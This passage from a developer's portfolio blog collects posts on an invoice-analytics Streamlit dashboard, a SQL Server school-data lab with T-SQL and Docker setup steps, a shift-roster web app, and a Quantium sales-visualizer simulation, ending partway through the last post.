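The same investigation, sketched in plain Python: total spend per month, flag months well above the median, then break the flagged month down by contractor. The sample rows and the "2x median" threshold are assumptions for illustration, not the dashboard's actual logic:

```python
from collections import defaultdict
from statistics import median

# Hypothetical (month, contractor, amount) rows.
rows = [
    ("2023-09", "ABC Plumbing", 2000.0),
    ("2023-10", "CoolAir HVAC", 2500.0),
    ("2023-11", "FireSafe", 9000.0),
    ("2023-11", "ABC Plumbing", 1500.0),
    ("2023-12", "CoolAir HVAC", 2200.0),
]


def monthly_totals(rows):
    """Sum invoice amounts per month."""
    totals = defaultdict(float)
    for month, _, amount in rows:
        totals[month] += amount
    return dict(totals)


def find_spikes(totals, factor=2.0):
    """Months whose total exceeds `factor` times the median monthly total."""
    threshold = factor * median(totals.values())
    return [month for month, total in sorted(totals.items()) if total > threshold]


def breakdown(rows, month):
    """Contractor totals for one month, largest first."""
    per_contractor = defaultdict(float)
    for row_month, contractor, amount in rows:
        if row_month == month:
            per_contractor[contractor] += amount
    return sorted(per_contractor.items(), key=lambda item: item[1], reverse=True)


totals = monthly_totals(rows)
spikes = find_spikes(totals)
print(spikes)
print(breakdown(rows, spikes[0]))
```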

Fun Fact

Built in 1 day as a side project during my working hours.

Origin story:

Started in the southB/ directory of my masters-swe-ai repo as a quick experiment. When I realized how useful it was, I:

Cleaned up the code
Made it modular
Created a standalone repo
Wrote comprehensive documentation
Deployed publicly

🔗 Links & Resources

Resource	Link
GitHub Repo	github.com/lfariabr/invoice-ledger
Source Code (southB origin)	masters-swe-ai/southB
Live Demo	streamlit app
Excel Template (fake data)	download & explore the data safely - fake data

🚀 Future Roadmap: From Dashboard to PropTech Platform

While the current version solves the immediate problem, here's the possible expansion plan:

1. Database Backend (PostgreSQL/Supabase)

Current: Upload Excel each time

Future: Persistent database with incremental updates

Benefits:

Historical version control
Audit trail (who queried what, when)
Multi-user access with authentication
API for integration with other building systems

2. Predictive Analytics (ML)

Use cases:

"Based on 4 years of data, predict next quarter's HVAC spending"
"Which contractors are trending expensive year-over-year?"
"Seasonal patterns: fire services spike in winter?"

Technical approach:

Time-series forecasting (Prophet)
Contractor spending clustering
Anomaly detection for unusual invoices

3. Automated Reporting

What it does:

Schedule weekly/monthly reports via email

Example workflows:

Every Monday: Summary of last week's spending
End of month: PDF report with charts for Owners Corporation
Budget alerts: Email if spending exceeds threshold

4. Integration with Building Management Systems

Current: Standalone dashboard

Future: Connect to existing PropTech stack

Integrations:

AFSS systems — Auto-import fire inspection costs
Strata software — Sync budget approvals
Contractor portals — Pull invoices directly
Power BI — Feed data to enterprise dashboards

Let's Connect!

Building Invoice Ledger Analytics was a perfect chance to turn operational friction into an engineering opportunity. If you're:

Working in PropTech or building management
Building internal tools for finance or operations
Interested in Python automation and data visualization
Looking for practical Streamlit examples
Hiring for backend/data/PropTech roles

I'd love to connect:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current	Future Extensions
Python, Streamlit, Pandas, openpyxl	PostgreSQL/Supabase, ML (Prophet/LangChain), Building System APIs (AFSS, Strata), React Native/PWA

Built with ☕ and firsthand building management experience

"The best code is the code that quietly removes friction from people's work."

Learning SQL Server the Hard Way: 16 Days of Real-World Database Work

Luis Faria — Mon, 26 Jan 2026 21:34:03 +0000

From "I've never used SQL Server" to "Here's my 1,000-line operational runbook": How I turned a job opportunity into a portfolio-building sprint.

Hard work is my preferred language and I try to speak it fluently.

🎯 The Opportunity

When "I Don't Know SQL Server" Becomes a Challenge

A friend reached out with an intriguing proposition: "Do you work with Microsoft SQL Server? We're desperate to fill a school data administrator role."

My honest answer? No—but I know databases.

My background spans PostgreSQL, MySQL, MongoDB, and GraphQL. I've built ETL pipelines, optimized queries, designed schemas, and managed production data systems. The fundamentals are universal: normalization, indexing, backup strategies, referential integrity, stored procedures.

SQL Server syntax? Just a dialect I hadn't learned yet.

But here's the thing about job opportunities in unfamiliar territory: saying "I can learn it" isn't enough. Hiring managers hear that every day. What they want is proof.

The Real Challenge

Can I go from zero SQL Server experience to interview-ready in two weeks, with portfolio-quality deliverables to prove it?

This wasn't just about learning T-SQL syntax. The role required:

Managing school data systems (student records, attendance, class scheduling)
Running reports for leadership and teaching staff
Integrating data from legacy systems like SEQTA and Synergetic
Maintaining backup/recovery procedures
Documenting operations for non-technical staff
Operating responsibly with child-safety-sensitive data

The approach: Treat it like a master's assignment. I've spent months tackling academic projects with a disciplined workflow: Receive Brief → Research → Design → Build → Document → Present → NEXT. Why not leverage that momentum?

This is where strategic use of LLMs came into play. Instead of aimlessly "learning SQL Server," I needed a structured challenge that would simulate real-world job responsibilities.

The Prompt That Launched the Project

The prompt:

"I need to demonstrate enterprise-level SQL Server skills for a school data administrator role. Create a comprehensive 3-level assessment covering: (1) database fundamentals and backup/restore, (2) reporting and data integration, (3) operational documentation and training. Structure it like an internal deliverable with real-world scenarios matching school systems like SEQTA and Synergetic."

The Problem

Build a "School Data Platform" on SQL Server, documented like an internal deliverable. Do the deed and show the proof.

The structure emerged as a 3-level assessment simulation (Level 1 → Level 2 → Level 3), matching exactly what the role calls for:

Assessment Level	Focus Area	Real-World Equivalent
Level 1	Database Fundamentals	"Won't break production"
Level 2	Data Integration & Reporting	"Can generate reports and move data between systems"
Level 3	Production Operations	"Documents well, trains staff, operates safely"

📦 StC DataLab Repo

Execution Plan (Dec 2025 - Jan 2026)

Date	Focus	Deliverables	Status
Dec 20-21	Setup & Schema	SQL Server Express + SSMS installation, DB creation, table structure	✅
Dec 22-23	Backup & Restore	Full backup/restore procedures, documentation with screenshots	✅
Dec 24-25	Data Generation	Realistic seed data with edge cases	✅
Dec 26-27	Reporting Views	Student profiles, class rolls, attendance summaries	✅
Dec 28-29	Stored Procedures	Parameter-based queries, optimization	✅
Dec 30-31	Import/Export	CSV handling, staging tables, data validation	✅
Jan 1-2	Runbook & Documentation	Operational procedures, troubleshooting guide	✅
Jan 3-4	Demo Preparation	Presentation script, screenshots, talking points	✅
Jan 5	Final Review	Validate all components, practice demo	✅

Complete changelog with 30+ commits

🤖 The Solution

Building an Enterprise Data Infrastructure

What started as "learn SQL Server syntax" evolved into a complete operational simulation. Here's what I built:

System Architecture


Database Architecture

The foundation is a normalized relational database representing a school's core operational data:

Core Tables (6):

Students (200 records) — Privacy-sensitive fields including medical info, emergency contacts, and boarding status
Staff (20 records) — Role-based attributes (Teacher, Principal, ICT, Admin, Counselor)
Subjects (12 records) — Curriculum structure covering Math, English, Science, Humanities, Arts, Technology
Classes (30 records) — Teacher assignments, room scheduling, year level groupings
Enrollments (500 records) — Student-class relationships with status tracking (Active, Withdrawn, Completed, Pending)
Attendance (800 records) — Daily tracking with status codes (Present, Absent, Late, Excused) across 10 days

Design Principles:

-- Example: Students table with constraints
CREATE TABLE Students (
    student_id INT IDENTITY(1,1) PRIMARY KEY,
    student_number NVARCHAR(20) UNIQUE NOT NULL,
    first_name NVARCHAR(50) NOT NULL,
    medical_info NVARCHAR(500), -- Privacy sensitive
    emergency_contact NVARCHAR(100),
    enrollment_year INT NOT NULL,
    INDEX idx_enrollment_year (enrollment_year)
    -- No separate index on student_number: its UNIQUE constraint already creates one
);

Operational Features

1. Reporting Views (4 core views)

vw_StudentProfile — Complete student records with emergency contacts
vw_ClassRoll — Daily attendance with class lists and teacher assignments
vw_AttendanceDaily — Roll call summaries with absence follow-up contacts
vw_EnrollmentSummary — Class capacity planning with utilization metrics

2. Stored Procedures (4 parameterized)

sp_GetStudentProfile — Multi-result set with profile + enrollments + attendance
sp_EnrollmentSummaryByYear — Year-level filtering with capacity indicators
sp_AttendanceByDate — Date range queries for specific time periods
sp_GetTableDataExport — Generic data export for Power BI integration

3. Data Integration Pipeline

CSV import staging tables with validation rules
Referential integrity checks before production load
Error logging and rollback procedures
Export functionality for SEQTA/Power BI sync

4. Backup & Recovery

Full backup T-SQL scripts (SQL Server Express compatible)
Differential backup procedures
Three-stage restore validation (verify → test → production)
RPO: 1 hour | RTO: 30 minutes

How It Works in Practice

Scenario 1: Morning Roll Call

-- Teacher logs in at 8:45 AM, needs today's class roll
EXEC sp_AttendanceByDate 
    @StartDate = '2025-01-22', 
    @EndDate = '2025-01-22';
-- Returns: Student list with attendance status, emergency contacts for absences

Scenario 2: Semester Planning

-- Leadership needs Year 7 enrollment metrics for 2026 planning
EXEC sp_EnrollmentSummaryByYear @EnrollmentYear = 2026;
-- Returns: Class utilization, capacity warnings, subject distribution

Scenario 3: System Integration

-- SEQTA export runs daily at 6 AM, imports new attendance data
-- 1. Load CSV into staging table
-- 2. Validate referential integrity (all student_ids exist)
-- 3. Merge into production Attendance table
-- 4. Log success/failures for monitoring
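
Steps 1 to 4 can be sketched outside the database to show the validation logic. In the project this runs in T-SQL against staging tables; the Python below is only an illustration, and the CSV columns and sample rows are assumptions:

```python
import csv
import io

# Hypothetical SEQTA-style export; the column names are assumptions.
ATTENDANCE_CSV = """student_id,date,status
1,2025-01-22,Present
2,2025-01-22,Late
999,2025-01-22,Absent
3,2025-01-22,Sleeping
"""

KNOWN_STUDENT_IDS = {1, 2, 3}
VALID_STATUSES = {"Present", "Absent", "Late", "Excused"}


def stage_and_validate(csv_text, known_ids):
    """Split staged rows into loadable rows and rejected rows with a reason."""
    valid, rejected = [], []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if not row["student_id"].isdigit() or int(row["student_id"]) not in known_ids:
            rejected.append((row, "unknown student_id"))
        elif row["status"] not in VALID_STATUSES:
            rejected.append((row, "invalid status"))
        else:
            valid.append(row)
    return valid, rejected


valid, rejected = stage_and_validate(ATTENDANCE_CSV, KNOWN_STUDENT_IDS)
print(len(valid), "rows ready to merge")
for row, reason in rejected:
    print("rejected:", row["student_id"], reason)
```

Keeping rejected rows together with a reason, rather than silently dropping them, is what makes the final logging step useful for monitoring.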

Data Quality by Design

Intentional edge cases throughout the seed data:

NULL values — Missing phone numbers (9%), NULL emergency contacts
Casing inconsistencies — Lowercase first names, uppercase emails, trailing spaces
International scenarios — Singapore/Jakarta addresses for boarding students
Duplicate data — Shared email addresses to test deduplication logic
Invalid formats — Phone numbers marked as '???', incomplete grades ('INC')

This messy data simulates real school system exports (SEQTA, Synergetic) where cleaning and validation are critical.
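
To make the cleaning step concrete, here is a small sketch of the kind of normalization these edge cases call for. It is written in Python for brevity (the project does this in T-SQL), and the field names and rules are assumptions for illustration:

```python
def clean_student(record):
    """Normalize one raw student row; unusable values become None."""
    first_name = record.get("first_name") or ""
    email = record.get("email") or ""
    phone = (record.get("phone") or "").strip()
    return {
        # title() is a simplification; names like "McDonald" need special handling.
        "first_name": first_name.strip().title() or None,
        "email": email.strip().lower() or None,
        # Keep a phone only if it contains at least one digit ('???' does not).
        "phone": phone if any(ch.isdigit() for ch in phone) else None,
    }


def shared_emails(records):
    """Return emails that appear on more than one cleaned record."""
    seen, duplicates = set(), set()
    for rec in records:
        email = rec["email"]
        if email is None:
            continue
        (duplicates if email in seen else seen).add(email)
    return duplicates


raw = [
    {"first_name": "  alice ", "email": "ALICE@EXAMPLE.COM ", "phone": "0400 111 222"},
    {"first_name": "Bob", "email": "alice@example.com", "phone": "???"},
    {"first_name": "carol", "email": None, "phone": None},
]
cleaned = [clean_student(r) for r in raw]
print(cleaned)
print(shared_emails(cleaned))
```

Normalizing casing and whitespace before the duplicate check matters: the two email values above only collide once they are trimmed and lowercased.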

Tech Stack

Layer	Technology	Purpose
Database	SQL Server 2022 Express	On-premise simulation (macOS via Docker)
Management	SSMS + sqlcmd CLI	GUI and scripted operations
Data Generation	T-SQL CTEs + temp tables	Deterministic seed data with edge cases
Backup	Native SQL Server backups	Full/differential with RPO/RTO targets
Integration	CSV imports via BULK INSERT	Simulates SEQTA/Synergetic exports
Documentation	Markdown + Mermaid	Runbooks, training guides, flowcharts

Project Structure:

stc_datalab/
├── sql/
│   ├── 00_create_db.sql          # Initial database creation
│   ├── 01_schema.sql             # Tables, constraints, indexes
│   ├── 02_seed_data.sql          # 1,500+ records with edge cases
│   ├── 03_views.sql              # 4 reporting views
│   ├── 04_stored_procedures.sql  # 4 parameterized SPs
│   ├── 05_import_export.sql      # CSV integration logic
│   └── 07_backup_restore.sql     # Backup/recovery procedures
├── data/
│   ├── students_import.csv       # Sample import data
│   ├── classes_import.csv
│   └── enrollments_import.csv
├── docs/
│   ├── Assessment1/              # Level 1: Setup & basics
│   ├── Assessment2/              # Level 2: Integration
│   └── Assessment3/              # Level 3: Operations
│       ├── 06_runbook.md         # 1,000+ line operational guide
│       ├── 07_demo_script.md     # Interview presentation
│       └── 08_staff_training_guide.md
└── screenshots/                  # 15+ annotated screenshots

The Impact: Confidence Through Deliverables

This wasn't just practice—it was portfolio-building with interview-ready artifacts:

Metric	Result
Technical documentation	3,000+ lines across 15 files
SQL scripts	10 files, 800+ lines of T-SQL
Seed data generated	1,562 records across 6 tables
Views & procedures	8 reusable database objects
Operational runbook	1,000+ lines with flowcharts
Training materials	Non-technical staff guide
Time investment	16 days, committed execution

What This Proves

Skill Category	Evidence
Database fundamentals	Schema design with normalization, constraints, indexes
T-SQL proficiency	CTEs, window functions, stored procedures, error handling
Data integration	CSV imports with staging, validation, rollback procedures
Backup/recovery	Full/differential backups, 3-stage restore validation
Documentation	Runbooks, training guides, troubleshooting flowcharts
Production mindset	Security (least privilege), audit logging, change management

Interview Readiness

Instead of saying "I can learn SQL Server", I can now walk into an interview and say:

"I built a production-grade school data platform with 6 normalized tables, 8 reporting objects, comprehensive backup procedures, and operational documentation. Here's the GitHub repo, here's the demo script, and here are the 15 annotated screenshots. Let me show you the runbook."

Future Roadmap: From Simulation to Production

While this project is interview-focused, the architecture supports real-world expansion:

1. Power BI Dashboard Integration

Connect reporting views to interactive dashboards
Real-time attendance monitoring with alerting
Enrollment trend analysis across years
Teacher workload visualization

2. Automated SEQTA Sync

Scheduled SSIS packages for nightly imports
Incremental updates with change data capture
Email notifications on import failures
Data quality scorecards

3. Advanced Security & Compliance

Row-level security based on staff roles
Column-level encryption (Always Encrypted) for medical_info, with Transparent Data Encryption covering the database at rest
Audit tables with temporal queries
GDPR-compliant data retention policies

4. Performance Optimization

Columnstore indexes for historical reporting
Query Store analysis for slow queries
Database partitioning by enrollment_year
Read replicas for Power BI loads

5. Cloud Migration Path

Azure SQL Database deployment
Geo-replication for disaster recovery
Azure Data Factory for ETL orchestration
Integration with Microsoft 365 (SharePoint, Teams)

Key Takeaways

This project reinforced several engineering principles:

Build to prove, not just to practice — Every decision was portfolio-oriented
Documentation = Deliverable — The runbook is as important as the code
Simulate real constraints — SQL Server Express limits forced production-ready design
Edge cases reveal skill — Intentional data quality issues prove validation competency
Timeline discipline — 16-day execution plan kept momentum and accountability

Try It Yourself

The complete project is open source and ready to deploy:

Resource	Link
GitHub Repo	github.com/lfariabr/stc-datalab
Setup Guide	Assessment 1 Documentation
Operational Runbook	06_runbook.md
Demo Script	07_demo_script.md

Quick Start (Docker):

# 1. Clone the repo
git clone https://github.com/lfariabr/stc-datalab.git
cd stc-datalab

# 2. Start SQL Server Express
docker run -e "ACCEPT_EULA=Y" \
  -e "MSSQL_SA_PASSWORD=StC_SchoolLab2025!" \
  -e "MSSQL_PID=Express" \
  -p 1433:1433 --name sqlserver \
  -d mcr.microsoft.com/mssql/server:2022-latest

# 3. Create database and schema (give the container a few seconds to finish starting first)
sqlcmd -S localhost -U sa -P 'StC_SchoolLab2025!' -C -i sql/00_create_db.sql
sqlcmd -S localhost -U sa -P 'StC_SchoolLab2025!' -C -i sql/01_schema.sql

# 4. Seed demo data
sqlcmd -S localhost -U sa -P 'StC_SchoolLab2025!' -C -i sql/02_seed_data.sql

# 5. Test reporting
sqlcmd -S localhost -U sa -P 'StC_SchoolLab2025!' -C -Q \
  "USE StC_SchoolLab; EXEC sp_AttendanceByDate @StartDate='2025-01-22', @EndDate='2025-01-22';"

Let's Connect!

This project exemplifies my approach to technical challenges: structured execution, production-quality deliverables, and comprehensive documentation. If you're:

Building enterprise data systems
Working with SQL Server in education/non-profit sectors
Interested in data engineering best practices
Hiring for database administration roles

I'd love to connect:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current Implementation	Production Extensions
SQL Server 2022 Express, SSMS, T-SQL, Docker, Markdown	Azure SQL Database, SSIS, Power BI, Columnstore Indexes, TDE, Azure Data Factory

Built with 🎓 and database discipline by Luis Faria

Hard work is my preferred language and I try to speak it fluently.

myRoster: from copy-paste to 2-minute submissions

Luis Faria — Wed, 21 Jan 2026 17:12:39 +0000

From tedious spreadsheet rituals to 2-minute submissions: how I turned a workplace pain point into a productivity multiplier.

"The best automation isn't flashy — it's invisible. It just works."

🎯 The Challenge:

When Spreadsheets Become a Time Sink

If you've ever worked in shift-based operations, you know the drill. Every roster cycle, the same tedious routine: open a spreadsheet, manually tick boxes for every single day you're available, triple-check you didn't miss anything, export it, draft an email, attach the file, and finally hit send. Rinse and repeat, week after week.

For one HR team I've met, this process was eating up valuable time that could have been spent on actual work:

Pain Point	Impact
Manual entry	15-20 minutes per roster cycle per employee
Inconsistent formats	HR receives varied submissions, coordination nightmare
Error-prone	Missed dates, wrong shifts, duplicate entries
Soul-crushing	Nobody looks forward to roster week

I saw this inefficiency firsthand and thought: There has to be a better way.

Spoiler: There was.

🤖 The Solution:

myRoster: Automation Meets Simplicity

That's when myRoster was born: a lightweight and intuitive web application that transforms shift availability submission from a chore into a 2-minute task.

How It Works

myRoster is built as a Streamlit-powered web app that users reach entirely through the browser. No complex installations, no training sessions: just open the link and you're ready to go. Here's what makes it tick:

1. Smart Roster Period Calculation
The app automatically calculates the next roster cycle based on HR's scheduling logic. No more guessing which dates to fill out—the system knows exactly what period you're submitting for, starting from the Monday three weeks ahead and spanning a full 4-week cycle.

2. Interactive Spreadsheet Interface
Instead of static forms, users interact with a familiar spreadsheet-like grid. Each week is organized in collapsible sections, showing dates, days of the week, and three shift columns (7am-3pm, 3pm-11pm, 11pm-7am). Just click the checkboxes for your available shifts—no hunting through dropdowns or typing dates manually.

3. One-Click Weekly Shortcuts
Need to mark yourself available for all morning shifts in a week? One button. Want to clear an entire week? Another click. These shortcuts eliminate repetitive clicking, cutting entry time by more than half.

4. Real-Time Progress Tracking
As you make selections, myRoster instantly updates your coverage statistics—showing total shifts selected, number of days covered, and a visual progress bar. You know exactly where you stand before submitting.

5. One-Click Submission
Hit "Preview & Submit," and myRoster generates a clean CSV file, automatically emails it to HR with a professional HTML template, and optionally sends you a copy. The entire process—from opening the app to hitting send—takes under 2 minutes.
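
The roster period rule from item 1 can be sketched with the standard library. This is a minimal interpretation, not the app's actual helper: it assumes "the Monday three weeks ahead" means the Monday of the current week plus three weeks, and the function name `next_roster_period` is hypothetical.

```python
from datetime import date, timedelta


def next_roster_period(today):
    """Return (start, end) of the 4-week cycle starting on the Monday three weeks ahead."""
    # weekday() is 0 for Monday, so this steps back to the current week's Monday
    monday_this_week = today - timedelta(days=today.weekday())
    start = monday_this_week + timedelta(weeks=3)
    # Four full weeks, with the end date being the final Sunday (inclusive)
    end = start + timedelta(weeks=4) - timedelta(days=1)
    return start, end


start, end = next_roster_period(date(2026, 1, 21))
print(start, end)
```

Passing `today` in as a parameter, instead of calling `date.today()` inside the function, keeps the calculation easy to test against fixed dates.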

Tech Stack

I kept the technology intentionally lean:

Layer	Technology	Purpose
Backend	Python 3.10+	Core logic, date calculations
Frontend	Streamlit	Interactive web UI, zero JS needed
Data	Pandas	Shift matrices, CSV export
Email	Gmail SMTP (GCP)	Automated delivery
Deployment	Streamlit Cloud	One-click deploy from GitHub

Project Structure:

myRoster/
├── app.py                    # Main Streamlit entry point
├── views/
│   └── rosterView.py         # UI components
├── helpers/
│   └── roster.py             # Date calculations
└── services/
    └── email.py              # Email automation

The modular architecture makes it easy to extend features or adapt for different scheduling needs.

The Impact: Time Saved, Efficiency Gained

The results speak for themselves:

Metric	Before	After
Submission time	15-20 minutes	~2 minutes
Format consistency	Varies by employee	100% standardized
Error rate	Frequent	Zero
Employee satisfaction	Dreaded task	Quick and painless

Future Roadmap: From MVP to Platform

While myRoster already delivers significant value in its current form, there's immense potential to evolve it from a standalone tool into a comprehensive workforce management platform. Here's what I've mapped out:

1. Multi-Provider Email Infrastructure

Current state: Relies solely on Gmail SMTP via Google Cloud Platform
Next iteration: Integration with Resend for more reliable transactional email delivery

Why this matters:

Automated reminders: Schedule notifications 48 hours before roster deadlines
Smart alerts: Notify HR when submissions are incomplete or coverage is below threshold
Employee confirmations: Send automatic receipts when availability is successfully submitted
Higher deliverability: Resend offers better inbox placement and detailed analytics compared to SMTP

This would transform myRoster from a submission tool into an active communication hub that keeps everyone informed and on track.

2. Robust Backend with Supabase

Current limitation: No persistent user data, authentication, or preferences
Next evolution: Full-stack upgrade with Supabase as the backend

Features unlocked:

Authentication: Secure login with email/password or SSO via EmploymentHero
User profiles: Save preferred shifts, notification settings, and contact preferences
Historical data: View past submissions, track coverage trends over time
Saved drafts: Start filling out availability, save progress, and return later
Admin dashboard: HR users get real-time coverage analytics, submission status tracking, and bulk operations
Role-based access control: Employees, HR, and managers see different views and capabilities

Why Supabase?

PostgreSQL database with real-time subscriptions (perfect for live coverage updates)
Built-in authentication and row-level security
RESTful and GraphQL APIs out of the box
Integrates seamlessly with Python backends
Free tier suitable for MVP, scales affordably

Migration path:
Current CSV-based workflow becomes a fallback option while Supabase gradually handles user data, preferences, and analytics storage.

3. Machine Learning #1: Pattern Recognition & Predictive Scheduling

What it does:
Analyze historical availability data to identify patterns in employee behavior, building coverage needs, and seasonal trends.

Use cases:

Coverage prediction: "Based on historical data, Building A typically has low evening shift coverage in December. Flag this 3 weeks in advance."
Employee behavior insights: "User X consistently submits availability on the last day—send them an early reminder."
Building-specific trends: "Building B requires 15% more morning shifts during summer months—adjust recommendations accordingly."
Anomaly detection: Flag unusual submission patterns that might indicate scheduling conflicts or errors

Technical approach:

Time-series analysis using scikit-learn or Prophet
Clustering algorithms to group similar availability patterns
Lightweight models that can run serverless (no heavy infrastructure needed)

Real-world impact:
HR teams can proactively address coverage gaps before they become emergencies, and employees get personalized nudges based on their actual behavior patterns.

4. Machine Learning #2: RAG-Powered Knowledge Base

Inspired by: AI Engineering na Prática: Construindo RAG com Neural Networks (in English: "AI Engineering in Practice: Building RAG with Neural Networks")

What it does:
Build a conversational AI assistant powered by Retrieval-Augmented Generation (RAG) that understands roster policies, shift rules, and employee FAQs.

Employee experience:

"Which shifts do I need to fill for Christmas week?" → AI retrieves company holiday policies + roster dates and provides personalized guidance
"What happens if I can't work my scheduled shift?" → AI surfaces shift swap procedures, contact info, and deadline policies
"Show me my availability history for Q4 2025" → AI queries the database and presents formatted historical data

HR experience:

Automated responses to repetitive questions
Instant access to shift coverage analytics via natural language queries
Policy enforcement reminders embedded in the chat experience

Technical stack:

Vector database (Pinecone, Weaviate, or Supabase pgvector) for document embeddings
LLM integration (OpenAI GPT-4, Claude, or open-source alternatives like Llama)
RAG framework (LangChain or LlamaIndex) for retrieval logic
Knowledge base: Company policies, shift rules, historical data, and FAQs

Why this is powerful:
Instead of just automating form submission, myRoster becomes an intelligent assistant that understands the nuances of scheduling, reduces HR support burden, and makes policy information instantly accessible.

5. EmploymentHero API Integration

Current pain point: Employees submit via myRoster → HR manually copies CSV data into EmploymentHero
Automated future: Direct API integration eliminates manual data entry entirely

How it works:

Employee submits availability in myRoster
System authenticates via EmploymentHero API
Availability data is automatically synced to the employee's EH profile
HR sees updated availability directly in their scheduling dashboard—no CSV, no copy-paste, no errors

Additional benefits:

Bi-directional sync: Pull existing shift schedules from EH into myRoster for reference
Conflict detection: Cross-reference submitted availability against existing scheduled shifts
Deeper insights: Combine myRoster's ML analytics with EH's payroll and attendance data for comprehensive workforce planning
Single source of truth: Eliminate data duplication and version control issues

Technical implementation:
EmploymentHero provides a REST API with endpoints for employee data, shift scheduling, and time & attendance. Integration would involve:

OAuth 2.0 authentication
Middleware service to translate myRoster data models into EH-compatible formats
Webhook listeners for real-time updates from EH back to myRoster

Real-world impact:
This closes the loop entirely. What started as "save 15 minutes per employee" becomes "eliminate an entire manual workflow for HR"—potentially saving dozens of hours per roster cycle across the organization.

Curious about the Timeline? Check my CHANGELOG for a detailed breakdown.

Key Takeaways

This project reinforced principles I apply to every build:

Start with the pain point: Every feature traces back to real user frustration
Ship fast, iterate often: MVP in days, not months
Boring tech wins: Streamlit + Pandas = production-ready in hours
Design for extensibility: Modular architecture enables future growth
Measure impact: cutting 15-20 minutes down to about 2 is a roughly 90% time reduction, the kind of number that screams ROI

Try It Yourself

myRoster is live and open source:

Resource	Link
Live Demo	myroster.streamlit.app
Source Code	github.com/lfariabr/roster

If you're building internal tools or automating workflows, I'd love to hear how you approach similar problems.

Let's Connect!

Building myRoster has been a perfect example of turning workplace friction into engineering opportunity. If you're:

Automating internal workflows
Building tools with Streamlit
Passionate about practical productivity solutions
Interested in Python automation

I'd love to connect:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current	Future
Python, Streamlit, Pandas, Gmail SMTP (GCP)	Supabase, Resend, OpenAI/RAG, EmploymentHero API, ML (scikit-learn/Prophet)

Built with ☕ and automation by Luis Faria

I Built a Sales Visualizer for a Real Business Problem (Quantium Software Engineering Simulation)

Luis Faria — Mon, 29 Dec 2025 22:22:56 +0000

It was the end of the year, and I thought a great way to close out 2025 would be to put myself through the Software Engineering simulation presented by Quantium on Forage.

After tackling the Tata GenAI Data Analytics Challenge and building various data-driven applications, I was ready for another hands-on project. That's when I discovered Quantium's Software Engineering simulation.

As someone who loves building practical solutions, I figured this would sharpen my skills in data processing, visualization, and end-to-end application development. Spoiler: it delivered exactly that.

"The best way to learn is by building something real."

Here's my journey of building a production-quality data visualizer from raw CSV files to a polished, interactive Dash application.

Want to jump in yourself? Check out the simulation here before reading. SPOILER ALERT ahead!

The Scenario: Software Engineer at Quantium

The simulation places you in the role of a software engineer at Quantium, working in the financial services business area. Here's the brief:

Client: Soul Foods

Problem: Sales decline on their top-performing candy product (Pink Morsels) after a price increase

Goal: Build an interactive data visualizer to answer: "Were sales higher before or after the price increase on January 15, 2021?"

This wasn't just a tutorial exercise. This was about solving a real business question with code.

The Challenge: Six Progressive Tasks

What I loved about this simulation was the progressive scaffolding. Each task built naturally on the previous one, mirroring how real software projects evolve.

Task 1: Set Up Local Development Environment

The first task was all about the fundamentals—forking the repo, setting up a Python virtual environment, and installing dependencies like Dash and Pandas.

The mindset shift: Don't underestimate a well-organized workbench. Time invested here pays dividends throughout the project.

Task 2: Data Processing — The Art of Reshaping Data

With the environment ready, I tackled three messy CSV files containing transaction data for Soul Foods's entire morsel product line. My job? Transform raw data into actionable insights.

The transformation pipeline:

Filter: Keep only Pink Morsels rows (bye-bye, other products)
Calculate: Multiply quantity × price to get Sales
Normalize: Handle currency symbols, parse dates, standardize regions
Output: A clean CSV with just Sales, Date, and Region

I built a robust ETL script with flexible column detection (find_column) to handle variations in column naming. This kind of defensive coding is essential for real-world data pipelines.
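
To make the pipeline concrete, here is a minimal standard-library sketch of the filter, calculate, and normalize steps. The post only names `find_column`; its signature here, the candidate column names, and the sample rows are all assumptions made for illustration, not the submitted code.

```python
import csv
import io


def find_column(fieldnames, candidates):
    """Return the header that matches any candidate, ignoring case and padding."""
    normalized = {name.strip().lower(): name for name in fieldnames}
    for candidate in candidates:
        if candidate in normalized:
            return normalized[candidate]
    raise KeyError(f"no column matching {candidates}")


def process(csv_text):
    """Filter to Pink Morsel rows and emit Sales, Date, Region."""
    reader = csv.DictReader(io.StringIO(csv_text))
    wanted = {
        "product": ["product", "product_name"],
        "price": ["price", "unit_price"],
        "quantity": ["quantity", "qty"],
        "date": ["date", "transaction_date"],
        "region": ["region"],
    }
    cols = {key: find_column(reader.fieldnames, names) for key, names in wanted.items()}
    cleaned = []
    for row in reader:
        if not row[cols["product"]].strip().lower().startswith("pink morsel"):
            continue  # drop every other product
        unit_price = float(row[cols["price"]].replace("$", "").strip())
        cleaned.append({
            "Sales": unit_price * int(row[cols["quantity"]]),
            "Date": row[cols["date"]].strip(),
            "Region": row[cols["region"]].strip().lower(),
        })
    return cleaned


raw = (
    "Product,Price,Qty,Date,Region\n"
    "pink morsel,$3.00,546,2018-02-06,North\n"
    "gold morsel,$9.99,10,2018-02-06,south\n"
)
result = process(raw)
print(result)
```

Raising a `KeyError` when no candidate header matches makes a renamed column fail loudly instead of producing an empty output file.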

Task 3: Create the Dash Application

Now the fun part—bringing data to life! I built a Dash application with:

A clear header explaining the business question
An interactive line chart showing daily sales over time
A vertical marker highlighting the price increase date (2021-01-15)

The visualization immediately answered Soul Foods's question—you can literally see the sales impact.

Key pattern: Let the data speak for itself. A simple line chart with a clear annotation was more powerful than any fancy visualization.
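
The chart answers the question visually, but the same before/after comparison can be reduced to a few lines of arithmetic. The sketch below uses made-up numbers, so it says nothing about the real Soul Foods result. The function name is hypothetical, and treating the cutoff date itself as "after" is an assumption.

```python
from datetime import date

PRICE_INCREASE = date(2021, 1, 15)


def mean(values):
    """Arithmetic mean, or None when there is nothing to average."""
    return sum(values) / len(values) if values else None


def average_sales_before_after(rows, cutoff=PRICE_INCREASE):
    """Return (mean before cutoff, mean on or after cutoff) for (date, sales) pairs."""
    before = [sales for day, sales in rows if day < cutoff]
    after = [sales for day, sales in rows if day >= cutoff]
    return mean(before), mean(after)


# Illustrative values only, not taken from the simulation dataset
made_up = [
    (date(2021, 1, 13), 100.0),
    (date(2021, 1, 14), 120.0),
    (date(2021, 1, 15), 150.0),
    (date(2021, 1, 16), 170.0),
]
before_avg, after_avg = average_sales_before_after(made_up)
print(before_avg, after_avg)
```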

